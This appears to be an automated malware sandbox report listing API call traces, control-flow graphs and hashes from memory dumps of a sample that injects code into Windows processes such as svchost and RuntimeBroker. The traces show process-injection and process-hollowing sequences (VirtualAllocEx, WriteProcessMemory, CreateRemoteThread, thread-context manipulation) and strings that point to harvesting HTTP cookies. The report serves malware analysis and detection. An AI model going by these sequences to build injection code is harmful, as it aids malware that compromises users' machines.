                • Part of subcall function 001C0BA6: ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 001C0BE7
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$Window$AddressExitFindLibraryLoadOpenProcThread
              • String ID:
              • API String ID: 3081398214-0
              • Opcode ID: efa8d9c2d975f273dedc56f725c716f6a4740850526463fb05e39f639ec900bd
              • Instruction ID: aba8e1325fc70c5bdf08b0507d9e73b3b069cfc1834b77748dc634d74a94ba5d
              • Opcode Fuzzy Hash: efa8d9c2d975f273dedc56f725c716f6a4740850526463fb05e39f639ec900bd
              • Instruction Fuzzy Hash: 0A01D175A44305BBEF026A708C89FAE365CAF28700F0904A9BD55EE1D6DBB0CC41C6B4
              APIs
              • FindWindowA.USER32(001C0B98,0000000E), ref: 001C0BAB
              • GetWindowThreadProcessId.USER32(00000000), ref: 001C0BB8
              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 001C0BC5
                • Part of subcall function 001C0E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
                • Part of subcall function 001C0E21: WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
                • Part of subcall function 001C0E21: IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B
              • ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 001C0BE7
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWow64Write
              • String ID:
              • API String ID: 1790362231-0
              • Opcode ID: 1263692a48715f6abef1e836abde3d8c1e86dad40dcc785cb29634c96280c8d8
              • Instruction ID: 8d2a110fdadbfcb79557eef3c6f04e088fde0ec6edb1f3a929b01c2de3428793
              • Opcode Fuzzy Hash: 1263692a48715f6abef1e836abde3d8c1e86dad40dcc785cb29634c96280c8d8
              • Instruction Fuzzy Hash: 5F11C465649241AEEF1367708D55F6A3B695F36700F1941DDF8149E0A3DB60CC02D678
              APIs
              • CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 001C26E8
              • GetFileSize.KERNEL32(?,00000000), ref: 001C2701
              • ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 001C2722
              • CloseHandle.KERNEL32(?), ref: 001C2733
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction ID: 1b7016d98d2ac921908da5a69b0d089c21a15c5119871dbff96ca870c68476b5
              • Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction Fuzzy Hash: 9D01EC30640309BBEF119F60CC8AF9D7AB4AF20B44F1041A9EA14F91E0D770AA619A18
              APIs
              • CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 001C275C
              • SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 001C2779
              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 001C2795
              • CloseHandle.KERNEL32(?), ref: 001C27A6
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandlePointerWrite
              • String ID:
              • API String ID: 3604237281-0
              • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction ID: e83ab4e8bfacfcbb9057bf8691385a7719df8e694ba331f985fc6044b9c84708
              • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction Fuzzy Hash: E501E430640209FFEF119FA0DC86F8D7AB5AF14B14F2041A8BA14B91E5D771AA20AB54

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000014.00000002.3337609995.0000000000930000.00000040.00000001.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_930000_ApplicationFrameHost.jbxd
              Similarity
              • API ID: Virtual$Protect$Alloc
              • String ID:
              • API String ID: 2541858876-0
              • Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction ID: a240a72feaf5064264a11685636bb554f6b31fbebda5d82e7a0317d967be0bdc
              • Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction Fuzzy Hash: 64212030A34C1D0BEB68627C9855764F6D6E79C720F540355E91ED36E8DD58CC8187C6

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000014.00000002.3337609995.0000000000930000.00000040.00000001.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_930000_ApplicationFrameHost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 50b9bfc1027b919213d53b7a227b831e8cd63d74d8fc691782eddb7c7225e531
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 68F082B2514604AFFB007BB08C99E7B369CEFC0301B440535FC56DA0AADD358C148D76

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000016.00000002.3337343363.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_180000_RuntimeBroker.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 3149fd5e89a7fd841218b20de542f0134e908d8158aa4892dacf1614708359ca
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 58F09AB2810508BFFB42BBB08C8987B329CEF643117400525FC4ACA09ADE308E188A75

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000017.00000002.3337350000.0000000000670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_23_2_670000_svchost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: fdd017bc4f08c7afcf87e07b651297a8cf3bba78ed7c602faa8bb3c56c252014
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: A9F082B2524604EFFB40BBB48C89C7B369EEF40301744953AFC4EDA09AED348C148579

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000018.00000002.3337758796.00000000009C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_9c0000_TextInputHost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: ea4300f626250abceef8d595b12beb5c15196607849e50899eaeaaf3389043bb
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: E9F05EB2914604AFFB007BB48C89F7B769CEEC1301B840539FC46DA09BDD348D14857A

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000019.00000002.3337644907.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_25_2_f70000_conhost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 6e2b851918056bc67e635c5c8ff4188357ff3b7750ec94a55f39c3998825fdec
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 9BF05EB2514604AFFB007BB48C89C7B36ACEE403117448636FC4ADA09AED389C189576

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 0000001B.00000002.2860829417.0000000000D50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_27_2_d50000_RuntimeBroker.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: ccfdfb1484f8b8f3a83523ca8d191273b27f32bbc0e696f19697ceaba78b43e6
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 20F0FEB6514504AFFF017BB49C8A97B7AACEE403137480936FC46DA49AED349C1C8975

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 11a097f-11a09a0 call 11a0d05 call 11a1506 call 11a3dc8 8 11a09a8-11a09ca 0->8 10 11a0b32-11a0b33 8->10 11 11a09d0-11a0a29 call 11a0a1a call 11a375b 8->11 19 11a0a2f-11a0a51 11->19 20 11a0b2d call 11a0b34 11->20 19->20 23 11a0a57-11a0a7c 19->23 20->10 23->20 25 11a0a82-11a0ac1 23->25 25->20 27 11a0ac3-11a0aef 25->27 27->20 29 11a0af1-11a0afd 27->29 31 11a0b02-11a0b26 29->31 31->10 34 11a0b28-11a0b2b 31->34 34->20 34->31
              Memory Dump Source
              • Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: 0b8a859419bef3d617e63a7bfb3ae72199e12125d1515e20da476af334188d5a
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: D9419071640214AFFB169F60CC85FA97BBCEF08744F440195BB49FE0D5DB709690CA65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 35 11a1386-11a1393 36 11a1399-11a139f 35->36 37 11a1435-11a1436 35->37 36->37 38 11a13a5-11a13bb 36->38 38->37 40 11a13bd-11a13d0 38->40 42 11a13d2-11a13d9 40->42 43 11a13dc-11a13ec call 11a0ebd 42->43 46 11a13ee-11a13fc 43->46 47 11a13fe 46->47 48 11a1401-11a142c 46->48 47->48 48->37
              Memory Dump Source
              • Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: 4a1dbe4fef6b1207fb1fd5e790cae69e961932a45e3d76ff7f9915237b15b533
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: A7219D31904216AFEB12DF7CC848B9DBFB5AF04710F498225FA55AF2D0E770A810CB94

              Control-flow Graph

              Memory Dump Source
              • Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
              • Instruction ID: 17af5398828778133b9aff3e3ae56e32fede575e02356ce31e8cff23fe4cd0a9
              • Opcode Fuzzy Hash: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
              • Instruction Fuzzy Hash: 9D11BF72404515AEDF03AF60C5C4CAA77ECEF50708F45096A9D85EF44DEF709154CAE5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 67 11a09a8-11a09ca 69 11a0b32-11a0b33 67->69 70 11a09d0-11a0a29 call 11a0a1a call 11a375b 67->70 78 11a0a2f-11a0a51 70->78 79 11a0b2d call 11a0b34 70->79 78->79 82 11a0a57-11a0a7c 78->82 79->69 82->79 84 11a0a82-11a0ac1 82->84 84->79 86 11a0ac3-11a0aef 84->86 86->79 88 11a0af1-11a0afd 86->88 90 11a0b02-11a0b26 88->90 90->69 93 11a0b28-11a0b2b 90->93 93->79 93->90
              Memory Dump Source
              • Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: c590e6525871e28ec5bf1cc32fb7939177094b04d34cfb7168bb8c7da6878535
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: 93014471644318AFEB13DE50CC81FAA73FCEF44B08F500195BB49EE0C5EAB065808AD9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 94 11a3fde-11a3ffa call 11a375b call 11a38a7 99 11a400c-11a403b call 11a404d * 3 94->99 100 11a3ffc-11a400a call 11a411e 94->100 113 11a4046 99->113 108 11a404b-11a404c 100->108 113->108 114 11a4046 call 11a404d 113->114 114->108
              Memory Dump Source
              • Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction ID: 3ba900b75d22df0e2b23722d6fea15d6bf92e37754e8c227e1fe291e303c70ee
              • Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction Fuzzy Hash: 8BF03778584281D7FB597BB08D49B8D3EA49F5170DF480090EA49BE896CFB85450AE72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 140 11a47f8-11a4810 call 11a3b24 143 11a4812-11a481b call 11a3b76 140->143 144 11a4820-11a4850 140->144 143->144 147 11a496a-11a496f 144->147 148 11a4856-11a4878 144->148 148->147 150 11a487e-11a48a3 148->150 152 11a48bb-11a48dd 150->152 153 11a48a5-11a48ba 150->153 155 11a48df-11a4901 152->155 156 11a4942-11a494c 152->156 153->152 155->156 161 11a4903-11a4925 155->161 157 11a494e-11a4960 call 11a377b 156->157 158 11a4963-11a4968 156->158 157->158 158->147 161->156 164 11a4927-11a493f 161->164 164->156
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: 6ccf0727ed01401a626e49db61abb50f3800be2e0998b3d0e87ae7461e62c3ef
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: 2D4183B6600208BFEF169F68CC48BDEBFB9FF84744F554058EA44AB154DB709650CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 115 11a47f7-11a4803 116 11a480e-11a4810 115->116 117 11a4809 call 11a3b24 115->117 118 11a4812-11a481b call 11a3b76 116->118 119 11a4820-11a4850 116->119 117->116 118->119 122 11a496a-11a496f 119->122 123 11a4856-11a4878 119->123 123->122 125 11a487e-11a48a3 123->125 127 11a48bb-11a48dd 125->127 128 11a48a5-11a48ba 125->128 130 11a48df-11a4901 127->130 131 11a4942-11a494c 127->131 128->127 130->131 136 11a4903-11a4925 130->136 132 11a494e-11a4960 call 11a377b 131->132 133 11a4963-11a4968 131->133 132->133 133->122 136->131 139 11a4927-11a493f 136->139 139->131
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: 6c83cbebc8eb518ed32b7d0727f88c016cd8d71cef4f10f802ea748da911eb94
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: 004192B6600208BFEF169FA4CC88BEEBFB9FF84704F154058EA44AB150DB709650CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 48 1c0e21-1c0e4f VirtualAllocEx 49 1c0eb7-1c0eba 48->49 50 1c0e51-1c0e6d WriteProcessMemory 48->50 50->49 51 1c0e6f-1c0e74 50->51 52 1c0e76-1c0e84 IsWow64Process 51->52 53 1c0ea1-1c0eb1 CreateRemoteThread 51->53 52->53 54 1c0e86-1c0e9f 52->54 53->49 54->49
              APIs
              • VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
              • WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
              • IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B
              • CreateRemoteThread.KERNELBASE(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001C0EB1
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
              • String ID:
              • API String ID: 3578747408-0
              • Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction ID: 9e1f878eac78179e63507154ab3e59f021aece4aaf68afa768676749f8b9bd9e
              • Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction Fuzzy Hash: 6A119A32240204FBFF215F21CC85FAA3B69EF84B54F188014FE48BE595D770E560CAA8

              Control-flow Graph

              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,00000008,00000000), ref: 021505DA
              • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000008,00000000), ref: 021505FB
              • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0215062B
              • NtWriteVirtualMemory.NTDLL(?,?,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0215064D
                • Part of subcall function 02150655: NtWriteVirtualMemory.NTDLL(?,?,02150F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0215066F
              Memory Dump Source
              • Source File: 0000001E.00000002.2599868439.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2150000_bin.jbxd
              Similarity
              • API ID: Memory$VirtualWrite$ProcessRead
              • String ID:
              • API String ID: 2369493071-0
              • Opcode ID: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
              • Instruction ID: 057d85d168950b252355cf8aac724bf97aeccbbd83dc4d69a715b4683cf7d263
              • Opcode Fuzzy Hash: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
              • Instruction Fuzzy Hash: CA111BB0380745BBE7209F45CCC4F96B766FF0C300F548124AB185A292CB71B9A4DB95

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 125 1c15e4-1c162a NtCreateUserProcess
              APIs
              • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 001C160C
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: CreateProcessUser
              • String ID:
              • API String ID: 2217836671-0
              • Opcode ID: 494cc3cd07106d3d7f3194012e93b0bf6877a4aa10ef2c29222b9a26aca699df
              • Instruction ID: f89654c994a3303b23e412f08d7b43ad8504f33b7d29e365df13ca103ac73e30
              • Opcode Fuzzy Hash: 494cc3cd07106d3d7f3194012e93b0bf6877a4aa10ef2c29222b9a26aca699df
              • Instruction Fuzzy Hash: F2F05436100109EFCF068F90DA94C9A3B32FF5D358B048159FE1A2A2A0C772A970EB58

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 126 2150655-2150672 NtWriteVirtualMemory 127 2150f82-2150fa0 call 2150677 call 2150fa5 126->127
              APIs
              • NtWriteVirtualMemory.NTDLL(?,?,02150F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0215066F
              Memory Dump Source
              • Source File: 0000001E.00000002.2599868439.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2150000_bin.jbxd
              Similarity
              • API ID: MemoryVirtualWrite
              • String ID:
              • API String ID: 3527976591-0
              • Opcode ID: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
              • Instruction ID: e88afff3d61980a56802db103e3dfb6d8113bf48b7cbd1a96aa272a1c5aa0c31
              • Opcode Fuzzy Hash: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
              • Instruction Fuzzy Hash: 1CF0AE74284611EFD328DF84C984B64B7A2FF5C310F158499E9998B3A1CB30A940CB45

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 132 1c16c0-1c16d0 133 1c16f7-1c1705 NtResumeThread 132->133 134 1c16d2-1c16f2 call 1c0e21 132->134 134->133
              APIs
              • NtResumeThread.NTDLL(?,?), ref: 001C16FD
                • Part of subcall function 001C0E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
                • Part of subcall function 001C0E21: WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
                • Part of subcall function 001C0E21: IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$AllocMemoryResumeThreadVirtualWow64Write
              • String ID:
              • API String ID: 308677811-0
              • Opcode ID: 9b38a38d15973d4ff94adcbc0bc85e50b42519dcf60a688b996de47f15e28dd2
              • Instruction ID: 50c68c5dfab682ea1a1f8b0f0c987396ec09a66bf25883eb63b730f6d608dfef
              • Opcode Fuzzy Hash: 9b38a38d15973d4ff94adcbc0bc85e50b42519dcf60a688b996de47f15e28dd2
              • Instruction Fuzzy Hash: 12E09A75100104BAEF029F54C999F4A3B70AB25358F044455EC09AE1C6C3F59524CB6C

              Control-flow Graph

              APIs
              • Sleep.KERNEL32(00001388), ref: 0214099A
              • RtlExitUserThread.NTDLL(00000000), ref: 021409A2
              • OpenMutexA.KERNEL32(001F0001,00000000), ref: 021409C2
              • GetStartupInfoA.KERNEL32(00000000), ref: 021409DA
                • Part of subcall function 02140A1A: CreateProcessA.KERNEL32(00000000,02140A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 02140A21
                • Part of subcall function 02140A1A: GetThreadContext.KERNEL32(?,00000000), ref: 02140A49
                • Part of subcall function 02140A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02140A74
                • Part of subcall function 02140A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,021459C8,00000000,00000000,00000002), ref: 02140AB9
                • Part of subcall function 02140A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02140AE7
                • Part of subcall function 02140A1A: ResumeThread.KERNEL32(?), ref: 02140AF7
                • Part of subcall function 02140A1A: Sleep.KERNEL32(000003E8), ref: 02140B07
                • Part of subcall function 02140A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02140B1E
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
              • String ID:
              • API String ID: 1099281029-0
              • Opcode ID: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
              • Instruction ID: c7c993d1c5668a210b8ff73b5b5b6419dd4ffa9bbc27daaa090734784bb80bb0
              • Opcode Fuzzy Hash: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
              • Instruction Fuzzy Hash: 1A416E71680218AFEB269F60CC85FA973ACEF44744F1401A5BB49FE0D5DB70A690CE69

              Control-flow Graph

              APIs
              • Sleep.KERNELBASE(00001388), ref: 001C099A
              • RtlExitUserThread.NTDLL(00000000), ref: 001C09A2
              • OpenMutexA.KERNEL32(001F0001,00000000), ref: 001C09C2
              • GetStartupInfoA.KERNEL32(00000000), ref: 001C09DA
                • Part of subcall function 001C0A1A: CreateProcessA.KERNEL32(00000000,001C0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001C0A21
                • Part of subcall function 001C0A1A: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A49
                • Part of subcall function 001C0A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A74
                • Part of subcall function 001C0A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C59C8,00000000,00000000,00000002), ref: 001C0AB9
                • Part of subcall function 001C0A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AE7
                • Part of subcall function 001C0A1A: ResumeThread.KERNEL32(?), ref: 001C0AF7
                • Part of subcall function 001C0A1A: Sleep.KERNEL32(000003E8), ref: 001C0B07
                • Part of subcall function 001C0A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0B1E
